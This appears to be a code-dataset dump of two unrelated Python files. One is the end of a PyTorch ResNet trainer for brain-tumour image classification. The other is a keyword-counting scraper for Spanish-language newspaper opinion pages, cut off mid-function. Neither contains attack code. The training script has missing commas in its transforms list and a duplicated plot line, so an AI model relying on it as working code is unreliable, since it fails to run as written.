for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block: object, planes: int, blocks: int, stride: Optional[int] = 1) -> nn.Sequential():
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class Model():
def __init__(self, net: 'model', criterion: object,
optimizer: object,
num_epochs: int,
dataloaders: dict[str, object],
dataset_sizes: dict[str, int],
device: torch.device) -> None:
super(Model, self).__init__()
self.net = net
self.criterion = criterion
self.optimizer = optimizer
self.num_epochs = num_epochs
self.dataloaders = dataloaders
self.dataset_sizes = dataset_sizes
self.device = device
def train_validate(self, history: bool = False) -> dict[str, float]| None:
since = time.time()
best_model_wts = copy.deepcopy(self.net.state_dict())
best_acc: float = 0.0
self.history: dict[str, list] = {
x: [] for x in ['train_loss', 'val_loss', 'train_acc', 'val_acc']
}
for epoch in range(self.num_epochs):
print(f'Epoch {epoch + 1}/{self.num_epochs}')
print('-' * 10)
for phase in ['train', 'test']:
if phase == 'train':
self.net.train()
else:
self.net.eval()
running_loss: float = 0.0
running_corrects: int = 0
for images, labels in self.dataloaders[phase]:
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
with torch.set_grad_enabled(phase == 'train'):
outputs = self.net(images)
_, pred_labels = torch.max(outputs, 1)
loss = self.criterion(outputs, labels)
if phase == 'train':
loss.backward()
self.optimizer.step()
running_loss += loss.item() * images.size(0)
running_corrects += torch.sum(pred_labels == labels.data)
epoch_loss: float = running_loss/ self.dataset_sizes[phase]
epoch_acc: float = running_corrects.double()/ self.dataset_sizes[phase]
if phase == 'train':
self.history['train_loss'].append(epoch_loss)
self.history['train_acc'].append(epoch_acc)
else:
self.history['val_loss'].append(epoch_loss)
self.history['val_acc'].append(epoch_acc)
print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
if phase == 'test' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(self.net.state_dict())
print()
time_elapsed = time.time() - since
print(f'Training Completed in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s')
print(f'Best Val Acc: {best_acc:.4f}')
if history:
return self.history
def train_ValAcc(self) -> 'plot':
train_acc_list = [float(x.cpu().numpy()) for x in self.history['train_acc']]
test_acc_list = [float(x.cpu().numpy()) for x in self.history['val_acc']]
plt.plot(train_acc_list, '-bx')
plt.plot(test_acc_list, '-rx')
plt.title('Model Accuracy Plot')
plt.xlabel('No of Epochs')
plt.ylabel('Accuracy')
plt.legend(['train', 'validation'], loc= 'best')
plt.show()
def train_valLoss(self) -> 'plot':
train_loss_list = [float(x) for x in self.history['train_loss']]
test_loss_list = [float(x) for x in self.history['val_loss']]
plt.plot(train_loss_list, '-bx')
plt.plot(train_loss_list, '-bx')
plt.plot(test_loss_list, '-rx')
plt.title('Model Loss Plot')
plt.xlabel('No of Epoch')
plt.ylabel('Loss')
plt.legend(['train', 'validation'], loc= 'best')
plt.show()
def confusion_matrix(self, class_names: list[str]) -> 'plot':
n_classes: int = len(class_names)
confusion_matrix = torch.zeros(n_classes, n_classes)
with torch.no_grad():
for images, labels in self.dataloaders['test']:
images = images.to(self.device)
labels = labels.to(self.device)
pred_labels = self.net(images)
_, pred_labels = torch.max(pred_labels, 1)
for t, p in zip(labels.view(-1), pred_labels.view(-1)):
confusion_matrix[t.long(), p.long()] += 1
plt.figure(figsize= (8, 5))
df_cm = pd.DataFrame(confusion_matrix, index= class_names, columns= class_names).astype(int)
df_cm = sns.heatmap(df_cm, annot= True, fmt= '.3g', cmap= 'Blues')
df_cm.yaxis.set_ticklabels(df_cm.yaxis.get_ticklabels(), rotation= 0, ha= 'right', fontsize= 10)
df_cm.xaxis.set_ticklabels(df_cm.xaxis.get_ticklabels(), rotation= 45, ha= 'right', fontsize= 10)
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.title('Confusion Matrix')
plt.show()
#@: Driver Code
if __name__.__contains__('__main__'):
path: 'dir_path' = 'C:\\Users\\RAHUL\\OneDrive\\Desktop\\tumor_dataset'
sub_path: list[str] = ['train', 'test']
categories: list[str] = ['glioma_tumor', 'meningioma_tumor', 'no_tumor', 'pituitary_tumor']
transforms_list = transforms.Compose([
transforms.Resize(256),
transforms.RandomCrop(256),
transforms.RandomRotation(360),
transforms.RandomVerticalFlip()
transforms.ToTensor()
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
train_data: object = TumorDataset(
path= path,
sub_path= sub_path[0],
categories= categories,
transform= transforms_list
)
test_data: object = TumorDataset(
path= path,
sub_path= sub_path[1],
categories= categories,
transform= transforms_list
)
train_loader = torch.utils.data.DataLoader(train_data, batch_size= 10, shuffle= True)
test_loader = torch.utils.data.DataLoader(test_data, batch_size= 10)
covid_plots = TumorAnalysis(data= train_data, loader= train_loader)
covid_plots.batchImg_display()
dataset_sizes: dict[str, int] = {
'train': len(train_data),
'test': len(test_data)
}
dataloaders: dict[str, object] = {
'train': train_loader,
'test': test_loader
}
device: torch.device = ('cuda:0' if torch.cuda.is_available() else 'cpu')
model = ResNet(BasicBlock, [2, 2, 2, 2]).to(device)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr= 1e-3)
image_classification_model = Model(
net= model,
criterion= criterion,
optimizer= optimizer,
num_epochs= 100,
dataloaders= dataloaders,
dataset_sizes= dataset_sizes,
device= device
)
image_classification_model.train_validate()
image_classification_model.train_ValAcc()
image_classification_model.train_valLoss()
image_classification_model.confusion_matrix(class_names= categories)
| [
"noreply@github.com"
] | noreply@github.com |
9ebb3ef4090282a4cf52fcc2b5888d18b54359f9 | 9308f06d79f7045f4a2866b103384231751e21b8 | /fetchURL-es.py | c71adb38e942c784d093a37079c34fa65ddbfdf5 | [] | no_license | orgullomoore/watchingamerica | ef51251caa74916599f787a6197e9c099d02be7a | d08f26fe73d027b68e4cb6b3d7a0b92ba9d80897 | refs/heads/master | 2016-08-04T15:15:49.906676 | 2014-07-11T17:11:30 | 2014-07-11T17:11:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,007 | py | import urllib.request
from urllib.error import URLError
import urllib
import codecs
import time
import re
currtimestr=''
currtime=time.gmtime()
for i in currtime[:6]:
currtimestr+=str(i)
logName='Log-'+currtimestr+'.html'
def fetchURL(someurl):
print('Fetching '+someurl)
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
response = opener.open(someurl)
except URLError as e:
if hasattr(e, 'reason'):
print('We failed to reach a server.')
print('Reason: ', e.reason)
elif hasattr(e, 'code'):
print('The server couldn\'t fulfill the request.')
print('Error code: ', e.code)
else:
# everything is fine
result='ok'
return response
threshold=0 #num of hits needed to merit a log entry
def hitcounter(sourcetext):
palabrasclave=[]
pcfile = codecs.open('palabrasclave.txt', 'r', 'utf8')
pctext = pcfile.read()
pcfile.close()
chuleta=pctext.split('\n')
for chu in chuleta:
palabrasclave.append(chu.rstrip())
for palabra in palabrasclave:
if len(palabra)<3:
palabrasclave.remove(palabra)
count=0
desc=''
for palabra in palabrasclave:
if palabra in sourcetext:
pccount=sourcetext.count(palabra)
count+=pccount
desc+=palabra+' ('+str(pccount)+'); '
return (count, desc)
def startLog():
towrite="""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Spanish articles most likely to be about America</title>
<meta http-le="" equiv="Content-Type"
content="text/html">
<meta charset="utf-8">
<script type="text/javascript"
src="http://www.kryogenix.org/code/browser/sorttable/sorttable.js"></script>
</head>
<body>
<table class="sortable">
<thead><tr>
<th class="">Title</th>
<th class="">Hits</th>
<th class="">Source</th>
<th class="">Date</th>
<th class="">Author</th>
<th class="">Desc</th>
</tr>
</thead> <tbody>
"""
logfile=codecs.open(logName, 'w', 'utf8')
logfile.write(towrite)
logfile.close()
def logRow(data):
#title, hits, source, date, author
towrite='<tr>'
for d in data:
towrite+='<td>'+d+'</td>'
towrite+='</tr>'
logfile=codecs.open(logName, 'a', 'utf8')
logfile.write(towrite)
logfile.close()
def endLog():
towrite="""
</tbody><tfoot></tfoot>
</table>
</body>
</html>
"""
logfile=codecs.open(logName, 'a', 'utf8')
logfile.write(towrite)
logfile.close()
def translateMonth(spanishdate):
toreturn=spanishdate.lower()
#separate dic for abbreviation must go last to avoid 06io and 07io for example
monthabbs={'ene': '01',
'feb': '02',
'mar': '03',
'abr': '04',
'may': '05',
'jun': '06',
'jul': '07',
'ago': '08',
'sep': '09',
'oct': '10',
'nov': '11',
'dic': '12'
}
monthdic={'enero': '01',
'febrero': '02',
'marzo': '03',
'abril': '04',
'mayo': '05',
'junio': '06',
'julio': '07',
'agosto': '08',
'septiembre': '09',
'octubre': '10',
'noviembre': '11',
'diciembre': '12',
}
for month in monthdic:
if month in toreturn:
toreturn=toreturn.replace(month, monthdic[month])
for abb in monthabbs:
if abb in toreturn:
toreturn=toreturn.replace(abb, monthabbs[abb])
return toreturn
#######BEGIN INDIVIDUAL PUBS
###clarin
def claringenerator(maxnumber=10):
listofurls=[]
caturl='http://www.clarin.com/opinion/'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<ul class="items" id="listadoautomatico')[1]
relchunk=relchunk.split('<div id="getMoreNotesContainer')[0]
chops=relchunk.split('<li class="item">')
for chop in chops[1:]:
urlterminus=chop.split('<a href="')[1].split('"')[0]
urlinicius='http://www.clarin.com'
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=clarinreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def clarinreader(url):
source='Clarín (AR)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div class="nota">')
actualtext=actualtext[1].split('<!--|googlemap|-->')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split("_sf_async_config.authors = '")[1].split("'")[0]
author=authorsnip.strip()[:25] #the pub does not separate authors from their titles
datesnip=bulktext.split('<div class="breadcrumb">')[1].split('</ul>')[0]
datesnip=datesnip.split('<li>')[-1].split('</li>')[0].strip()
date=time.strftime("%Y%m%d", time.strptime(datesnip, "%d/%m/%y"))
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end clarin
###elcomercioPE
def elcomercioPEgenerator(maxnumber=10):
listofurls=[]
caturl='http://elcomercio.pe/opinion/columnistas'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<section class="box-resultados">')[1]
relchunk=relchunk.split('</section>')[0]
chops=relchunk.split('<article class="f-result')
for chop in chops[1:]:
urlterminus=chop.split('<h2><a href="')[-1].split('"')[0]
urlterminus=urlterminus.split('?')[0] #we dont need variables
urlinicius=''
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=elcomercioPEreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def elcomercioPEreader(url):
source='El Comercio (PE)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div class="txt-nota" itemprop="articleBody">')
actualtext=actualtext[1].split('<div class="tags">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split("""<meta property="og:title" content='""")[1]
titlesnip=titlesnip.split("'")[0]
author=''
try:
titlesnip=titlesnip.split(', por ')[0] # pub includes author in title
author=titlesnip.split(', por ')[1]
except:
titlesnip=titlesnip
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
if author=='':
try:
author=bulktext.split('<li class="autor">')[1].split('</li>')[0]
except:
author='None found.'
author=author.strip()
datesnip=bulktext.split('<meta name="bi3dPubDate" content="')[1].split(' ')[0]
datesnip=datesnip.replace('-', '')
date=datesnip.strip()
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end elcomercioPE
###elespectador
def elespectadorgenerator(maxnumber=10):
listofurls=[]
caturl='http://www.elespectador.com/opinion'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<!--Inicio Columnistas del dia-->')[1]
relchunk=relchunk.split('<!--Fin Columnistas del dia-->')[0]
chops=relchunk.split('<div class="una_noticia">')
for chop in chops[1:]:
urlterminus=chop.split('<h2>')[-1].split(' href="')[1].split('"')[0]
urlinicius='http://www.elespectador.com'
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=elespectadorreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def elespectadorreader(url):
source='El Espectador (CO)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div class="content_nota">')
actualtext=actualtext[1].split('<div class="paginacion">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<h5 class="columnista_nombre">Por: ')[1].split('</h5>')[0]
author=authorsnip.strip()
datesnip=bulktext.split('<meta name="cXenseParse:recs:publishtime" content="')[1].split('T')[0]
datesnip=datesnip.replace('-', '')
date=datesnip.strip()
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end elespectador
###elmercurio
def elmercuriogenerator(maxnumber=9):
listofurls=[]
caturl='http://www.elmercurio.com/blogs/'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<!-- COLUMNA IZQUIERDA -->')[1]
relchunk=relchunk.split('<!-- END COLUMNA IZQUIERDA -->')[0]
chops=relchunk.split('<li id="NoticiaColumnista')
urlinicius='http://www.elmercurio.com'
for chop in chops[1:]:
urlterminus=chop.split('<div class="titulo_box_home"')[1].split('<a href="')[1].split('"')[0]
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
featuredurl=catpage.split('<div id="content_destacado_home"')[1].split('<a href="')[1].split('"')[0]
featuredurl=urlinicius+featuredurl
listofurls.append(featuredurl)
for url in listofurls[:maxnumber]:
parsethis=elmercurioreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def elmercurioreader(url):
source='El Mercurio (CL)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div class="content_info_despliegue" id="CajaCuerpo">')
actualtext=actualtext[1].split('<div class="contenedor-paginacion-medios-inf-blog">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<h1 class="titulo_despliegue_nota">')[1].split('</h1>')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
try:
authorsnip=bulktext.split('<div class="txt_autor">')[1].split('</a>')[0].split('>')[-1]
author=authorsnip.strip()
except:
author='None found.'
datesnip=bulktext.split('<div class="fecha_despliegue_nota">')[1].split('</div>')[0]
datesnipdiv=datesnip.split(' ')
day=datesnipdiv[1]
year=datesnipdiv[5]
month=translateMonth(datesnipdiv[3])
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end elmercurio
###elnacional
def elnacionalgenerator():
listofurls=[]
caturl='http://www.el-nacional.com/opinion/'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<!-- PAGE MAIN (AREA) -->')[1]
relchunk=relchunk.split('<!-- AUX LISTING ITEMS -->')[0]
urlregexmain=r'<h2 class="entry-title"><a class="lnk" href="(\S+)">.+</a></h2>'
urlregexfeat=r'<a href="(\/opinion\/\S+)" class="lnk".*>.+</a>'
listofurls+=re.findall(urlregexmain, relchunk)
listofurls+=re.findall(urlregexfeat, relchunk)
listofurls=set(listofurls)
for url in listofurls:
if not url.startswith('http://'):
url='http://www.el-nacional.com'+url
parsethis=elnacionalreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def elnacionalreader(url):
source='El Nacional (VE)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<!-- MCE BODY CONTENT -->')
actualtext=actualtext[1].split('<!-- END: PAGE BODY -->')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<title>')[1].split('</title>')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<link rel="alternate" title="')[1].split('"')[0]
author=authorsnip.strip()
datere=r'<small class="dateline"><span id="clock" class="time" style="color: white">.+</span> (\d{2}) de ([A-Z][a-z]+) de (\d{4})</small>'
datesnipdiv=re.findall(datere, bulktext)[0]
day=datesnipdiv[0]
month=translateMonth(datesnipdiv[1].lower())
year=datesnipdiv[2]
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end elnacional
###elpais
def elpaisgenerator(maxnumber=20):
listofurls=[]
caturl='http://elpais.com/elpais/opinion.html'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<div class="caja opinion">')[1]
relchunk=relchunk.split('<div class="columna_secundaria">')[0]
chops=relchunk.split('title="Ver noticia">')
for chop in chops[:-1]:
urlinicius='http://elpais.com'
chopdiv=chop.split('\n')[-1]
urlterminus=chopdiv.split('<a href="')[1].split('"')[0]
if urlterminus.startswith('http://'):
urlinicius=''
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=elpaisreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def elpaisreader(url):
source='El País (ES)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div id="cuerpo_noticia" class="cuerpo_noticia">')
actualtext=actualtext[1].split('<div class="envoltorio_publi estirar">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<span class="autor">')[1].split('</a></span>')[0].split('>')[-1]
author=authorsnip.strip()
datesnip=bulktext.split('<meta name="DC.date" scheme="W3CDTF" content="')[1].split('"')[0]
datesnip=datesnip.replace('-', '')
date=datesnip.strip()
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end elpais
###eltiempo
def eltiempogenerator(maxnumber=7):
listofurls=[]
caturl='http://www.eltiempo.com/opinion'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<section class="mod_columnistas modulo">')[1]
relchunk=relchunk.split('<!-- End column a -->')[0]
chops=relchunk.split('<article class="articulo_columnistas">')
urlinicius='http://eltiempo.com'
for chop in chops[1:]:
urlterminus=chop.split('<h2><a href="')[1].split('"')[0]
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=eltiemporeader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def eltiemporeader(url):
source='El Tiempo (CO)'
bulktext=fetchURL(url).read().decode('utf8')
actualtext=bulktext.split('<div class="cuerpo_texto" itemprop="articleBody">')
actualtext=actualtext[1].split('<footer class="footer-article">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<h2 itemprop="name">')[1].split('</h2>')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<h3 class="creditos">')[1].split('</a></h3>')[0].split('>')[-1]
author=authorsnip.strip()
try:
datesnip=bulktext.split('<meta property="article:published" itemprop="datePublished" content="')[1].split('"')[0]
datesnipdiv=datesnip.split(' ')
day=datesnipdiv[1]
month=translateMonth(datesnipdiv[2])
year=datesnipdiv[3]
except:
datesnip=bulktext.split('<time datetime="')[1].split('"')[0].split('| ')[1]
datesnipdiv=datesnip.split(' ')
day=datesnipdiv[0]
if len(day)<2:
day='0'+day
month=translateMonth(datesnipdiv[2])
year=datesnipdiv[-1]
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end eltiempo
###eluniversal
def eluniversalgenerator(maxnumber=25):
listofurls=[]
caturl='http://www.eluniversal.com.mx/opinion-columnas-articulos.html'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<div id="noteContent">')[1]
relchunk=relchunk.split('<a href="http://foros.eluniversal.com.mx"><h4 class=')[0]
chops=relchunk.split('<a class="linkBlack"') ##columns and editorials
chops+=relchunk.split('<h2 class="linkBlueBigTimes"') #featured
#chops+=relchunk.split('<h3 class="linkBlueMedium"><a') #excluding blogs for now
urlinicius=''
for chop in chops[1:]:
try:
urlterminus=chop.split(' href="')[1].split('"')[0]
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
except:
print('Fail')
for url in listofurls:
if url.startswith('/'):
listofurls.remove(url)
for url in listofurls[:maxnumber]:
parsethis=eluniversalreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def eluniversalreader(url):
source='El Universal (MX)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
if '<h3>¿No es suscriptor de EL UNIVERSAL?</h3>' in bulktext:
print('Excluding premium article')
return ('', '0', '', '', '', '')
actualtext=bulktext.split('<div class="noteText">')
actualtext=actualtext[1].split('<div id="paginatorFooter">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<h2 class="noteTitle">')[1].split('</h2>')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<div id="noteContent"><span class="noteColumnist">')[1].split('</span>')[0]
author=authorsnip.strip()
datesnip=bulktext.split("<META name='date' content='")[1].split("'")[0]
datesnip=datesnip.replace('-', '')
date=datesnip.strip()
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end eluniversal
###eluniverso
def eluniversogenerator():
listofurls=[]
caturl='http://www.elmundo.es/opinion.html'
catpage=fetchURL(caturl).read().decode('iso-8859-15') #rebels
relchunk=catpage.split('<div class="cabecera-seccion">')[1]
relchunk=relchunk.split('<section class="hot-topics">')[0]
listofurls+=re.findall(r'(http://www.elmundo.es/opinion/\d{4}/.*)"', relchunk)
listofurls=set(listofurls)
for url in listofurls:
parsethis=eluniversoreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def eluniversoreader(url):
source='El Universo (ES)'
bulktext=fetchURL(url).read().decode('iso-8859-15', errors='replace')
actualtext=bulktext.split('itemprop="articleBody"')
actualtext=actualtext[1].split('<section class="valoracion" id="valoracion">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<h1 itemprop="headline">')[1].split('</h1>')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('s.prop75="')[1].split('";')[0]
author=authorsnip.strip()
datesnip=bulktext.split('<meta property="article:published_time" content="')[1].split('T')[0]
date=datesnip.strip().replace('-', '')
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end eluniverso
###excelsior
def excelsiorgenerator(maxnumber=6):
listofurls=[]
caturl='http://www.excelsior.com.mx/opinion'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<div class = "mb2 float-left width664px height50 spriteFull background-hoy-escriben" > </div>')[1]
relchunk=relchunk.split('"float-left width664px placa-seccion-opinion color-nacional"')[0]
chops=relchunk.split('<div class = "option-section-title-text" >')
urlinicius=''
for chop in chops[1:]:
urlterminus=chop.split(' href = "')[1].split('"')[0]
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=excelsiorreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def excelsiorreader(url):
source='Excélsior (MX)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
actualtext=bulktext.split('<!-- body -->')
actualtext=actualtext[1].split('<!-- /body -->')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<span id="node-autor"')[1].split('</a>')[0].split('>')[-1]
author=authorsnip.strip()
datesnip=bulktext.split('<span id="node-date"')[1].split('</span>')[0].split('>')[-1]
datesnip=datesnip.strip().split(' ')[0]
datesnipdiv=datesnip.split('/')
year=datesnipdiv[2]
month=datesnipdiv[1]
day=datesnipdiv[0]
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end excelsior
###lanacion
def lanaciongenerator(maxnumber=20):
listofurls=[]
caturl='http://www.lanacion.com.ar/opinion'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('itemtype="http://data-vocabulary.org/Breadcrumb">')[1]
relchunk=relchunk.split('<section id="informacion2">')[0]
urlregex=r'<a href="(\/\d+-\S*)" class="info">'
listofurls+=re.findall(urlregex, relchunk)[:maxnumber]
listofurls=set(listofurls)
for url in listofurls:
if not url.startswith('http://'):
url='http://lanacion.com.ar'+url
parsethis=lanacionreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def lanacionreader(url):
source='La Nación (AR)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
actualtext=bulktext.split('<section id="cuerpo"')
actualtext=actualtext[1].split('<span class="fin">')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('LN.NotaTM.authors="')[1].split('";')[0]
author=authorsnip.strip()
datesnip=bulktext.split('<span class="fecha" itemprop="datePublished" content="')[1].split('"')[0]
datesnipdiv=datesnip.strip().split(' ')
year=datesnipdiv[-1]
day=datesnipdiv[1]
if len(day)<2:
day='0'+day
month=translateMonth(datesnipdiv[3])
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end lanacion
###milenio
def mileniogenerator(maxnumber=100):
listofurls=[]
caturl='http://www.milenio.com/firmas/'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<h3 class="index-title">')[1]
chops=relchunk.split('<h3 class="entry-short">')
urlinicius='http://www.milenio.com/'
for chop in chops[1:]:
urlterminus=chop.split('<a class="lnk" href="')[1].split('"')[0]
fullurl=urlinicius+urlterminus
listofurls.append(fullurl)
for url in listofurls[:maxnumber]:
parsethis=milenioreader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def milenioreader(url):
source='Milenio (MX)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
actualtext=bulktext.split('<div itemprop="articleBody"')
actualtext=actualtext[1].split('<!-- END: NESTED GRID 1/4 - 3/4 -->')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<meta name="Author" content="')[1].split('"')[0]
author=authorsnip.strip()
datesnip=bulktext.split('<meta name="Pubdate" content="')[1].split('"')[0]
date=datesnip.strip().replace('-', '')
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end milenio
###prensalibre
def prensalibregenerator():
listofurls=[]
caturl='http://www.prensalibre.com/opinion/'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<!-- LEFT COL -->')[1]
relchunk=relchunk.split('<!-- RIGHT COL -->')[0]
urlregex=r'<h2><a href="(\/opinion\/\S+)">.+</a></h2>'
listofurls+=re.findall(urlregex, relchunk)
listofurls=set(listofurls)
for url in listofurls:
if not url.startswith('http://'):
url='http://prensalibre.com'+url
parsethis=prensalibrereader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def prensalibrereader(url):
source='Prensa Libre (GT)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
actualtext=bulktext.split('<!-- Texto de Opinión -->')
actualtext=actualtext[1].split('<!-- Otras noticias de la sección -->')[0]
hitsinfo=hitcounter(actualtext)
